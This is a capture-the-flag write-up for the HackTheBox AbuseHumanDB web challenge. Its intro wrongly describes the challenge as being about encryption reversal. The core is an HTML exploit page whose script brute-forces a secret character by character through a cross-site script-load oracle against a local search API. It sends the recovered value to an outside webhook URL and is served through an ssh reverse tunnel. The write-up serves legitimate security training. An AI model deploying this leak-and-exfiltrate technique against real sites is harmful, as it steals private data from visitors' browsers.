HackTheBox AbuseHumanDB Writeup
Explore the basics of cybersecurity in the AbuseHumanDB Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
Use a webhook service like https://app.interactsh.com/, a VPS with a public port, or a tunneling service to expose the service.
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<html>
<head></head>
<body>
<script type="text/javascript">
flag_charset = "}0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!$()*,-[]_}";
var flag = "HTB{";
var charIndex = 0;
const bruteForce = () => {
var script = document.createElement("script");
script.src = `//127.0.0.1:1337/api/entries/search?q=${flag}${flag_charset.charAt(charIndex)}`;
document.body.appendChild(script);
script.onload = () => {
flag += flag_charset.charAt(charIndex);
charIndex = 0;
script.parentNode.removeChild(script);
if (flag.slice(-1) != '}') {
bruteForce();
} else {
img = new Image();
img.src = 'https://webhook.com?flag=' + flag; // <-- WebHookUrl
}
};
script.onerror = () => {
script.parentNode.removeChild(script);
charIndex += 1;
bruteForce();
};
};
bruteForce();
</script>
</body>
</html>
1
python -m http.server
1
ssh -R 80:localhost:8000 localhost.run
Send the tunnel HTTP URL in the Abusive Content URL and check your webhook.
Summary
The AbuseHumanDB Challenge on Hack The Box is an easy-level challenge where participants create a brute-force script in an HTML page to guess a flag, using a localhost.run tunnel to expose the server and capture the result via a webhook. This challenge offers a hands-on introduction to web vulnerabilities and flag retrieval techniques.